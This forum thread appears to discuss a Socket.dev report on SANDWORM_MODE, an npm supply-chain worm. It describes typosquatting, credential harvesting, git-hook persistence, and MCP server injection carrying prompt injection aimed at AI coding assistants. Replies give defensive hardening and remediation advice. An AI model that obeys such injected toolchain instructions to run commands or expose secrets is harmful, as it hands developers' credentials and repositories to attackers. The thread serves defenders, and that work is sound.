Malware News SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains

Khushal

Khushal

Level 11
Thread author
Verified
Top Poster
Well-known
Apr 4, 2024
523
2,756
969
Content source
https://socket.dev/blog/sandworm-mode-npm-worm-ai-toolchain-poisoning?utm_medium=feed
An active Shai-Hulud-like supply chain worm campaign spreads via typosquatting and AI toolchain poisoning, across at least 19 malicious npm packages and linked to two npm aliases. The sample retains Shai-Hulud hallmarks and adds GitHub API exfiltration with DNS fallback, hook-based persistence, SSH propagation fallback, MCP server injection with embedded prompt injection targeting AI coding assistants, and LLM API Key harvesting.
Click to expand...
socket.dev

SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflow...

An emerging npm supply chain attack that infects repos, steals CI secrets, and targets developer AI toolchains for further compromise.
socket.dev socket.dev
 
  • Like
Reactions: Andy Ful, simmerskool, harlan4096 and 1 other person
Khushal said:
socket.dev

SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflow...

An emerging npm supply chain attack that infects repos, steals CI secrets, and targets developer AI toolchains for further compromise.
socket.dev socket.dev
Click to expand...
The scenario described (npm typosquatting + “AI toolchain poisoning” + credential/token theft) fits a common supply-chain attacker playbook: get code execution during install/build, steal developer secrets (GitHub/LLM keys), then use persistence and lateral movement to spread further.

I can’t verify the specific package names or the “at least 19 malicious packages / two npm aliases” claim from here without opening the linked research, so treat the details as “per the Socket post” and confirm against the vendor’s indicators before taking package-specific actions.

Why this is high-impact
  • npm install-time execution: Malicious packages often abuse lifecycle scripts (preinstall/install/postinstall/prepare) to run code on developer machines and CI.
  • Credential harvest: GitHub tokens, SSH keys, and LLM API keys are high-value and can quickly lead to repo compromise, malicious releases, and broader supply-chain spread.
  • Developer-tool persistence: Hook-based persistence (e.g., Git hooks) and “tooling injections” can survive normal dependency cleanup and re-infect projects.
  • AI assistant angle: “Prompt injection” embedded in toolchain artifacts (including MCP server–style integrations) is essentially social engineering aimed at getting the assistant/user to run unsafe commands or disclose secrets.

Immediate defensive steps (safe, low-risk) for devs/teams
  • Freeze and contain: Pause deployments and CI releases for affected repos until dependencies are validated.
  • Identify exposure: Review recent dependency changes (package.json + lockfile diffs) and look for new/odd packages, especially close-miss names (typosquats).
  • Reinstall safely for triage: Test installs in an isolated container/VM; consider “no scripts” installs to reduce risk:
    • npm: use install approaches that disable lifecycle scripts (commonly done via npm config / flags such as “ignore scripts”) during investigation.
  • Hunt for persistence: Check for unexpected Git hooks in .git/hooks, unusual shell profile additions, and suspicious startup entries on dev workstations/CI images.
  • Rotate secrets as if stolen: GitHub tokens, SSH keys, npm tokens, CI secrets, and any LLM/API keys used on the dev machine/CI should be rotated if there’s any chance install-time code ran.
  • Check GitHub access: Review recent authentication events, new deploy keys, new GitHub Apps/OAuth authorizations, added collaborators, and unexpected workflow changes.

What to look for in npm supply-chain compromises
  • New dependencies that were not intentionally added (including transitive changes that appear after a lockfile update).
  • Lifecycle scripts that fetch/run remote code, decode blobs (base64), or invoke PowerShell/curl/wget/node with inline scripts.
  • Obfuscated JavaScript in package “install” paths, or unusual binaries shipped inside the package tarball.
  • Network indicators during install/build (DNS beacons, GitHub API calls, or outbound traffic to uncommon hosts).

AI toolchain / MCP-style integration hardening
  • Treat all tool output and embedded instructions as untrusted input (even if it “looks like” project documentation).
  • Disable auto-approval for tool actions; require explicit human confirmation before running shell commands or modifying security-sensitive files.
  • Keep secrets out of the assistant’s reachable context: don’t store API keys in plaintext files the assistant can read; prefer secret managers and least-privilege tokens.
  • Restrict egress from CI/build where possible (allowlist endpoints), so exfiltration attempts fail noisily.

If you suspect you installed one of the malicious packages
  • Do not keep “debugging” on your primary workstation.
  • Collect evidence first (package name/version, lockfile, npm logs, CI logs, outbound network logs), then remove/restore from a known-good commit.
  • Assume token theft and rotate/replace secrets; review GitHub/org audit logs and npm publish history for unauthorized activity.
  • If this affects a team/org, escalate internally as an incident (it’s not just “a bad package,” it’s potentially credential compromise).

If you want actionable guidance tailored to your environment, the safest next step is to work from the indicators in the Socket post (package list, versions, IOCs) and cross-check them against your lockfiles and CI logs, then proceed with secret rotation and persistence checks as above.
 
Technical Analysis & Remediation

MITRE ATT&CK Mapping

T1195.001
Supply Chain Compromise
(Software Dependencies)

T1059
Command and Scripting Interpreter
(npm lifecycle scripts)

T1552
Credentials in Files
(LLM API Key harvesting)

T1556
Modify Authentication Process
(GitHub token theft)

T1048
Web Service
(GitHub API exfiltration)

CVE Profile
N/A [CISA KEV Status: Inactive].
This attack abuses native npm functionality rather than exploiting a specific software vulnerability.

Telemetry

Origin Vector
"at least 19 malicious npm packages" linked to two npm aliases.

Persistence
Modifications to .git/hooks and unusual shell profile additions.

Exfiltration/C2
GitHub API exfiltration with DNS fallback.

Constraint
The exact package names and hashes are absent from the provided source text; however, the structure suggests base64 decoding and anomalous curl/wget/node invocations during install phases.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

GOVERN (GV) – Crisis Management & Oversight

Command
Halt deployments and CI releases for any repository exhibiting unauthorized dependency updates until the package lockfile is validated.

DETECT (DE) – Monitoring & Analysis

Command
Query SIEM for anomalous outbound DNS beacons, GitHub API calls, and child processes spawning from npm install.

Command
Hunt for unauthorized modifications within .git/hooks across all developer workstations.

RESPOND (RS) – Mitigation & Containment

Command
Revoke and rotate all GitHub tokens, SSH keys, npm publish tokens, and LLM API keys present on exposed workstations and CI runners.

Command
Disable auto-approval for AI tool actions to prevent prompt-injected commands from executing silently.

RECOVER (RC) – Restoration & Trust

Command
Roll back package.json and lockfiles to a verified clean commit.

Command
Rebuild CI environments from pristine images.

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

Command
Enforce --ignore-scripts during local npm installs to disable lifecycle script execution during investigations.

Command
Store API keys in secure vaults rather than plaintext files accessible to AI coding assistants.

Remediation - THE HOME USER TRACK (Safety Focus)

Environmental Check
Node.js, npm, and AI coding toolchains are not default components of Windows or macOS. If you are not a software developer, this Threat Level is Theoretical/Low.

Priority 1: Safety

Command
If you are a developer and suspect you ran an untrusted npm install, disconnect the machine from the internet immediately to halt DNS/GitHub API exfiltration.

Command
Do not log into banking/email until verified clean.

Priority 2: Identity

Command: Immediately reset your GitHub password and revoke all active Personal Access Tokens (PATs) or SSH keys using a known clean device.

Priority 3: Persistence

Command
Check your shell profiles (.bashrc, .zshrc) and project .git/hooks for unauthorized scripts.

Hardening & References

Baseline
CIS Benchmarks for Node.js / CI/CD Pipeline Security.

Framework
NIST CSF 2.0 / SP 800-61r3.

Source
Socket.dev Security Blog
Click to expand...
 
  • Like
Reactions: simmerskool and harlan4096
For the domestic user, these worms are not armies storming the fortress, but termites working silently beneath the floorboards. One lives in peace, until one day the chair collapses and you discover the wood was hollow. It’s not that the monster comes looking for us, it’s that it hides inside the apps we use. The best approach is to maintain digital hygiene as if sweeping the yard every morning, because you never know which tiny creature is preparing its conquest. 🪵🐜🧹